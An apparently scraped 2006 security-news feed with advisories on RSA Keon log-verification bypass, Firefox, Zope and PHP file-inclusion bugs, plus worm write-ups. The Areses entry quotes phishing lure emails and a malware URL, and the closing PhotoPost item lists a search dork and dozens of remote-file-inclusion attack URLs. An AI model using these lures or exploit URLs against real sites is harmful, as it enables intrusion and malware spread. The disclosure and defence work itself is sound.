Tue, 26 Sep 2006 03:26:32 -0500 http://www.securityalertz.com/ SecurityAlertz.Com en-us http://www.securityalertz.com/images/logo.gif http://www.securityalertz.com/ admin@securityalertz.com http://www.securityalertz.com/Article2222.html
Arhont Advisory by: Andrei Mikhailovsky
Advisory: RSA Keon Manager log verification bypass
Product release: Versions 6.6 and 6.5.1
Arhont ref: arh200605-1
Class: Design flaw
Model Specific: Other versions of RSA Keon are likely to be
vulnerable


DETAILS:
During the analysis of RSA Keon Certificate Authority Manager, Arhont
Ltd consultants have discovered several vulnerabilities in the Log
Verification function. A rogue CA (Certificate Authority) administrator
or any local administrative user with the access to the CA server could
manipulate the secure logging process to disguise his/her activities.

The RSA Keon product has a designed role separation capability to
enable
the specific role of the CA Auditor, separate from the role of the CA
Administrator. The CA Auditor is responsible for looking over the
activity of the CA, including CA reconfiguration, certificate vetting,
signing, revocation, suspension, etc. The Auditor relies on the logging
facility of the Keon software, which has a Log verification function.
This option checks the cryptographic hash signatures embedded in the
log
file against the contents of the log file to prevent log modification.
The log files generated by the Keon software are signed and stored for
the purpose of verification and are designed to be temper proof.
However, Arhont consultants have found at least two ways to bypass the
Log verification functionality of the RSA Keon software.


Vulnerability 1

The default installation of the Keon stores xml logs in a «C:\Program
Files\ RSA Security\ RSA_KeonCA\LogServer\logs\.xml» file.
The logs are stored in the following format:




......


......

..
..
..
..






......


......

..
..
..
..



..
..
..

Depending on the activity cycle of the Keon CA, each log file usually
contains a number of blocks as shown above. It is possible to delete
the
entire with its signature from the log file without failing
the verification process of the Log verification functionality of the
Keon Software. Therefore, it would be possible to hide a malicious
activity from the CA Auditor.

The log verification function seems to lack the capability to store a
cryptographic checksum of the entire pool in each of the
log
files. Instead, it only stores the cryptographic checksum for each of
the .

During the RSA Keon analysis Arhont consultants have found the
following
methods of deleting logs to be effective against the Log Verification
function:

1.It is possible to swap, duplicate, or add the first and the last BLOCK> from each of the files in the log directory.
2.It is possible to swap, duplicate, add or delete the
located anywhere in the file. However, deleting the first and the last
from the log file gives an integrity failure message in the
verification function.



Vulnerability 2

The local system administrator of the CA server or any user having a
read/write access to the RSA Keon LogServer directory can delete, add
and modify any entries in the live log file. Once the file has been
tempered, it will remain on the server until the next log rotation
schedule. Once the log file is rotated, the cryptographic hashing and
signing is performed and the log entries are grouped and signed. The
log
files are then available for the CA Auditor to monitor and verify.

As you can see, there is an opportunity for a rogue or disgruntled CA
administrator to perform malicious activities and remove the
corresponding logs before they are cryptographically signed by the
LogServer. Once the signing is made, the Auditor can successfully
verify
the log files that has been tempered.


RISK FACTOR:
The risk factor of Vulnerability 1 and 2 highly depends on the
organisation and the use of the RSA Keon CA. In organisations where the
CA functionality is not highly critical to the business activities and
continuity, the Risk factor is moderate. However, in the organisations
where the Certificate Authority use is paramount to the security and
business continuity and where the Logging activities should be closely
monitored and audited, vulnerabilities present a high risk factor.
Therefore, this could present a threat to the organisational compliance
with standards such as Sarbanes-Oxley, HIPAA and Basel II, where the
great emphasis on the audits and controls is highlighted. In addition,
the Common Criteria certification demands a complete and secure
separation of the CA Administrator and CA Auditor roles and thus can be
seriously affected by this vulnerability.


WORKAROUNDS:
Vulnerability 1:
This is likely to be a functionality design flaw. To fix this
vulnerability, the Log signing functionality should include an
additional feature of creating and storing the signature for all of the
sections in the log file. Any modifications made to the
critical sections of the log file will be flagged out by the incorrect
signature.


Vulnerability 2:
This vulnerability seems to be related to the design fault similar to
Vulnerability 1. In order to prevent the log modification, the live log
file should be locked by the operating system or the Keon software.
Alternatively, it should be possible to implement an incremental log
signing process to store a cryptographic hash signatures of the file
content before each log file is signed and written. The second solution
might not be optimal due to the high resource consumption on the busy
Keon servers.




COMMUNICATION HISTORY:
RSA Security notified on 17/06/2006 - No Response
RSA Security notified again on 01/09/2006 - No Response
Release of advisory to public domain on 21/09/2006
]]> Tue, 26 Sep 2006 03:26:32 -0500 http://www.securityalertz.com/Article2219.html Updated: September 11, 2006 08:50:06 AM GDT
Type: Worm
Infection Length: 21,262 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


W32.Areses.Q@mm is a mass-mailing worm that opens a back door on the compromised computer and may download files.


ProtectionVirus Definitions (LiveUpdate™ Daily) September 6, 2006
Virus Definitions (LiveUpdate™ Weekly) September 6, 2006
Virus Definitions (Intelligent Updater) September 6, 2006
Virus Definitions (LiveUpdate™ Plus) September 6, 2006
Threat AssesmentWildWild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
DamageDamage Level: Medium
Payload: Sends copies of itself by email to addresses gathered from the compromised computer.
Large Scale E-mailing: Uses its own SMTP engine to mass-mail copies of itself to addresses gathered from the compromised computer.
DistributionDistribution Level: Medium
Subject of Email: Varies
Name of Attachment: Varies
Size of Attachment: Varies

When W32.Areses.Q@mm is executed, it performs the following actions:


Copies itself as the following file:

%Windir%\csrss.exe

Note: %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt.


Adds the value:

"Debugger" = "%Windir%\csrss.exe"

to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Image File Execution Options\explorer.exe

so that it runs every time Windows starts.


Adds the value:

"Application" = "[VARIABLE DWORD VALUE]"

to the registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows NT
\CurrentVersion\Devices

so that it runs every time Windows starts.


Attempts to create a mutex named Numen#Syscall@ and exits if the attempt fails. This ensures that no more than one instance of the worm can run on a computer at any time.


Attempts to inject its code into the svchost.exe and services.exe processes.


Checks for the presence of the 127.0.0.1 string in the following registry subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
\Parameters\Interface\[INTERFACE CLSID]\"NameServer"


Stops the mass-mailing routine if the above value is found.


Creates the file %Temp%\Message.hta (A copy of W32.Areses.Q!vbs.)

Note: %Temp% is a variable that refers to the Windows temporary folder. By default, this is C:\Windows\TEMP (Windows 95/98/Me/XP) or C:\WINNT\Temp (Windows NT/2000).


Gathers email addresses from files with the following extensions:


.adb
.asp
.cfg
.cgi
.mra
.dbx
.dhtm
.eml
.htm
.html
.jsp
.mbx
.mdx
.mht
.mmf
.msg
.nch
.ods
.oft
.php
.pl
.sht
.shtm
.stm
.tbb
.txt
.uin
.wab
.wsh
.xls
.xml
.dhtml


Avoids email addresses that contain any of the following strings:


@example.
2003
2004
2005
2006
@microsoft
rating@
f-secur
news
update
.qmail
.gif
anyone@
bugs@
contract@
feste
gold-certs@
help@
info@
nobody@
noone@
0000
Mailer-Daemon@
@subscribe
kasp
admin
icrosoft
support
ntivi
unix
bsd
linux
listserv
certific
torvalds@
sopho
@foo
@iana
free-av
@messagelab
winzip
google
winrar
samples
spm111@
..
-0
.00
@.
---
abuse
panda
cafee
spam
pgp
@avp.
noreply
local
root@
postmaster@
.0
.1
.2
.3
.4
.5
.6
.7
.8
.9


Uses its own SMTP engine to send itself to the email addresses that it finds. The email has the following characteristics:

From: Spoofed

Subject:
One of the following:


Hi, what's up?
He, where are you?
Hi, drop me a line!!!
Hi! Please write to me urgently!
Hi! I'm waiting you online today!
Will you be online today?
When you're gonna answer me?
Re: write to me!
Re: Call me!
Re: Where are you?
Re: When you're gonna answer me?
Hi!!! How's the mood?
Re: How's the mood?
Re: Where have you been?

Message:
One of the following:


Hi!!!!! You haven't been writing for a long time. I began to worry) Where have you been? You remember, you've asked a progy from me? I've finally found it, so here it is. Check it out if this is what you've been looking for... bye


Hi, what's up? Will you show up online today?
Drop me a line in ICQ, ok? Btw, I'm sending you the docs you've been looking for, find them attached. Check them out, ok?


Hi!
I'm coming to you tomorrow, ok? When you are going to be home?
You remember, you've asked some docs. Please find them attached. Check and see what's inside. That's it. Bye, till tomorrow...


Hi!
You disappeared again. If you come online, drop me a line, ok?
Btw, I sent you those docs that you've been looking for. Check them out. Bye!


Hi, give me a call just when you got the message! I'm tired of waiting. Btw, I'm sending that program that you've been looking for. Check it out. Appears to be that one. Bye!


Hi, what's up? If you have time tomorrow, please come over. After midday. By the way, don't forget to check the enclosed documents. Bye. See you tomorrow.


Hi, I got a free day tomorrow, and I'm waiting for you. Please come after midday. By the way, I'm sending you the documents that you've been asking for. Read them out... Bye!


Hi, how are you? What are your plans today? If you have time, please come over, and don't forget to check the program attached. Bye!


Hi, what's you gonna do today? I'll come over tonight! By the way, don't give anyone this funny program I'm sending. Check it out. Bye!


Hi, I found that program you asked for. Find it attached. Bye.


Hi, I saw you around today, but you didn't noticed me ( If you're gonna be at home, give a call, ok? By the way, check this file I'm sending. A very interesting program...


What's up! You haven't been writing for a long time
I got news. I've finally that program you needed
I'm sending it out. Use it. Bye!


Hi, drop me a line today, ok? And see the program I'm sending. Bye!


Hi, drop me a line if you can. Btw, I have a new ICQ. Please don't forget to check the attached documents. Bye.


Hi! How are you? Drop me a line if you can. I found your documents and I'm emailing them to you. Bye.

Attachment:
One of the following with a .hta extension:


Message
File
Document
README
Passwords
Readme
Important
New
COOL
Archive
Fotos
private
confidential
secret
images
your_documents
backup


Attempts to contact the following remote site and may download a file:

[http://]xeseretuo.com/m2/g[REMOVED]


May open a back door on a random TCP port.


May search for folders that contain the following strings:


bear
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
shar
source
upload
pub


If the above folders are found, it attempts to copy itself as one of the following files with a .exe, .pif or .scr extension:


1
1001 Sex and more.rtf
3D Studio Max 6 3dsmax
ACDSee 10 full
Adobe Photoshop 10 full
Adobe Premiere 10
Ahead Nero 8
Altkins Diet.doc
American Idol.doc
Arnold Schwarzenegger.jpg
Best Matrix Screensaver new
Britney sex xxx.jpg
Britney Spears and Eminem porn.jpg
Britney Spears blowjob.jpg
Britney Spears cumshot.jpg
Britney Spears fuck.jpg
Britney Spears full album.mp3
Britney Spears porn.jpg
Britney Spears Sexy archive.doc
Britney Spears Song text archive.doc
Britney Spears.jpg
Britney Spears.mp3
Clone DVD 6
Cloning.doc
Cracks & Warez Archiv
Dark Angels new
Dictionary English 2004 - France.doc
DivX 8.0 final
Doom 3 release 2
E-Book Archive2.rtf
Eminem blowjob.jpg
Eminem full album.mp3
Eminem Poster.jpg
Eminem sex xxx.jpg
Eminem Sexy archive.doc
Eminem Spears porn.jpg
Eminem.mp3
Full album all.mp3
Gimp 1.8 Full with Key
Harry Potter 1-6 book.txt
Harry Potter 5.mpg
Harry Potter all e.book.doc
Harry Potter e book.doc
Harry Potter game
Harry Potter.doc
Harry Potter and the Sorcerer',27h,'s Stone game
How to hack new.doc
Internet Explorer 9 setup
Kazaa Lite 4.0 new
Kazaa new
Keygen 4 all new
Learn Programming 2004.doc
Lightwave 9 Update
Magix Video Deluxe 5 beta
Matrix 3 .mpg
Microsoft Office 2003 Crack best
Microsoft WinXP Crack full
MS Service Pack 6
source code
Norton Antivirus 2005 beta
Opera 11 free
Partitionsmagic 10 beta
Porno Screensaver britney
RFC compilation.doc
Ringtones.doc
Nostradamus.doc
World Trade Center last video.mpeg
anthrax.doc
Osama Bin Laden.jpg
Taliban
Osama bin Laden.mpg
Yellow Pages
Ringtones.mp3
Saddam Hussein.jpg
Screensaver2
Serials edition.txt
Smashing the stack full.rtf
Star Office 9
Teen Porn 15.jpg
The Sims 4 beta
Ulead Keygen 2004
Visual Studio Net Crack all
Vista review.doc
WinAmp 13 full with sources
Windows Vista Sourcecode.doc
Windows 2003 crack
Windows XP crack
WinXP eBook newest.doc
XXX hardcore pics.jpg

To delete the value from the registry:

Click Start > Run.
Type regedit
Click OK.

Note: If the registry editor fails to open the threat may have modified the registry to prevent access to the registry editor. Security Response has developed a tool to resolve this problem. Download and run this tool, and then continue with the removal.


Navigate to the subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\Image File Execution Options\explorer.exe


In the right pane, delete the value:

"Debugger" = "%Windir%\csrss.exe"


Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows NT
\CurrentVersion\Devices


In the right pane, delete the value:

"Application" = "[VARIABLE DWORD VALUE]"


Exit the Registry Editor.





]]> Mon, 18 Sep 2006 13:01:40 -0500 http://www.securityalertz.com/Article2218.html Updated: September 18, 2006 04:16:46 PM GDT
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


W32.Lunalight@mm is a mass-mailing worm that gathers email addresses from the compromised computer.

ProtectionVirus Definitions (LiveUpdate™ Daily) September 19, 2006
Virus Definitions (LiveUpdate™ Weekly) September 20, 2006
Virus Definitions (Intelligent Updater) September 19, 2006
Virus Definitions (LiveUpdate™ Plus) September 19, 2006
Threat AssesmentWildWild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
DamageDamage Level: Low
Payload: Copies itself to open shares.
DistributionDistribution Level: Low

Writeup By: James O'Connor]]> Mon, 18 Sep 2006 12:56:16 -0500 http://www.securityalertz.com/Article2217.html
1) An error in the handling of JavaScript regular expressions containing a minimal quantifier can be exploited to cause a heap-based buffer overflow.

Successful exploitation may allow execution of arbitrary code.

2) The auto-update mechanism uses SSL to communicate securely. The problem is that users may have accepted an unverifiable self-signed certificate when visiting a web site, which will allow an attacker to redirect the update check to a malicious web site in a man-in-the-middle attack.

3) Some time-dependent errors during text display can be exploited to corrupt memory.

Successful exploitation may allow execution of arbitrary code.

This is related to:
SA21513

4) An error exists within the verification of certain signatures in the bundled Network Security Services (NSS) library.

For more information:
SA21903

5) An error in the cross-domain handling can be exploited to inject arbitrary HTML and script code in a sub-frame of another web site via a "[window].frames[index].document.open()" call.

6) An error exists due to blocked popups opened from the status bar via the "blocked popups" functionality being opened in an incorrect context in certain situations. This may be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary web site.

7) Some unspecified memory corruption errors may be exploited to execute arbitrary code.

Solution:
Update to version 1.5.0.7.
http://www.mozilla.com/firefox/

Provided and/or discovered by:
1) Priit Laes, CanadianGuy, Girts Folkmanis, and Catalin Patulea
2) Jon Oberheide
3) Jonathan Watt and Michal Zalewski
4) Philip Mackenzie and Marius Schilder, Google
5-6) shutdown
7) Bernd Mielke, Georgi Guninski, Igor Bukanov, Jesse Ruderman, Martijn Wargers, Mats Palmgren, Olli Pettay, shutdown, and Weston Carloss

Original Advisory:
1) http://www.mozilla.org/security/announce/2006/mfsa2006-57.html
2) http://www.mozilla.org/security/announce/2006/mfsa2006-58.html
3) http://www.mozilla.org/security/announce/2006/mfsa2006-59.html
4) http://www.mozilla.org/security/announce/2006/mfsa2006-60.html
5) http://www.mozilla.org/security/announce/2006/mfsa2006-61.html
6) http://www.mozilla.org/security/announce/2006/mfsa2006-62.html
7) http://www.mozilla.org/security/announce/2006/mfsa2006-64.html
]]> Mon, 18 Sep 2006 12:53:21 -0500 http://www.securityalertz.com/Article2216.html
Input passed to the "phpbb_root_path" parameter in bb_usage_stats/includes/bb_usage_stats.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 0.58. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

Provided and/or discovered by:
NoGe

Original Advisory:
http://nyubicrew.org/adv/Noge_adv_02.txt
]]> Mon, 18 Sep 2006 12:52:37 -0500 http://www.securityalertz.com/Article2215.html
Input passed to the "RP_PATH" parameter in index.php and other unspecified files is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

The vulnerability has been reported in version 2.5. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
home_edition_2001

Original Advisory:
http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
]]> Mon, 18 Sep 2006 12:52:11 -0500 http://www.securityalertz.com/Article2214.html
1) Input passed to the "dir" parameter in starnet/editors/htmlarea/popups/images.php is not properly verified before being used. This can be exploited to list certain contents of arbitrary directories via directory traversal attacks.

2) Input passed to the "cmsdir" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Example (confirmed in versions 2.4.03 and 2.4.02):
http://[host]/starnet/modules/include/include.php?cmsdir=[file]

Examples (confirmed in version 2.4.02):
http://[host]/starnet/modules/sn_allbum/slideshow.php?cmsdir=[file]
http://[host]/starnet/themes/editable/main.inc.php?cmsdir=[file]

NOTE: Reportedly, other files are also affected.

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in versions 2.4.02 and 2.4.03. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Simo64

Original Advisory:
http://milw0rm.com/exploits/2374
]]> Mon, 18 Sep 2006 12:51:46 -0500 http://www.securityalertz.com/Article2213.html
The vulnerability is caused due to an error in the use of the docutils module to parse and render "restructured" text. This can be exploited to disclose certain information via the "csv_table" reStructuredText directive.

The vulnerability has been reported in versions 2.7.0 through 2.7.9 and 2.8.0 through 2.8.8.

Solution:
Apply patch.
http://www.zope.org/Products/Zope/Hotfix-2006-08-21/Hotfix-20060821

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.zope.org/Products/Zope/Hotfix-2006-08-21/Hotfix-20060821/README.txt
]]> Mon, 18 Sep 2006 12:51:20 -0500 http://www.securityalertz.com/Article2212.html
The vulnerability is caused due to a memory corruption error in the Microsoft Multimedia Controls ActiveX control (daxctle.ocx) in the "CPathCtl::KeyFrame()" function. This can be exploited by e.g. tricking a user into viewing a malicious HTML document passing specially crafted arguments to the ActiveX control's "KeyFrame()" method.

Successful exploitation allows execution of arbitrary code.

NOTE: A somewhat working exploit is publicly available for partially patched versions of Windows 2000. However, Secunia has successfully created a fully working exploit for Windows XP SP2 (fully patched).

It is also possible to crash the browser via the "Spline()" method.

Solution:
Only allow trusted websites to run ActiveX controls.

Provided and/or discovered by:
nop

Changelog:
2006-09-15: Added Microsoft, US-CERT, and CVE references.

Original Advisory:
http://www.xsec.org/index.php?module=releases&act=view&type=2&id=20

Microsoft:
http://www.microsoft.com/technet/security/advisory/925444.mspx

Other References:
US-CERT VU#377369:
http://www.kb.cert.org/vuls/id/377369
]]> Mon, 18 Sep 2006 12:50:11 -0500 http://www.securityalertz.com/Article2211.html #
# PhotoPost PHP 4.6 - 4.5 [PP_PATH] >> Remote File Include
Vulnerability
#
######################################################################################
# Found by ..........: AG-Spider
# our Web Site : ---- http://www.ArabAttack.com
# Arab Attack Security Team
######################################################################################
# Affected Software .: PhotoPost PHP
# Vendor ............: http://www.popphoto.com
# Risk & Class...: high-Remote File Inclusion
# C0ntAct ...........: AG-Spider [at] msn [dot] com
######################################################################################
#
# require "pp-inc.php";
# require "$PP_PATH/languages/$pplang/addfav.php";
# require "$PP_PATH/login-inc.php";
#
######################################################################################
# Dork :"Powered by: PhotoPost PHP 4.6"
# "Powered by: PhotoPost PHP 4.5"
#
# Exploit :-
#
# http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/register.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/search.php?PP_PATH=[Attack Shell]?
# http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]?
######################################################################################
#
#
# Greets 2 : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <>
CRASH_OVER_RIDE <> SwEEt-deVil <> Young Hacker
# our Web Site : ---- http://www.ArabAttack.com
# Arab Attack Security Team
######################################################################################
#
# thx 2 :::::: Lezr.com
#
######################################################################################

]]> Mon, 18 Sep 2006 12:46:29 -0500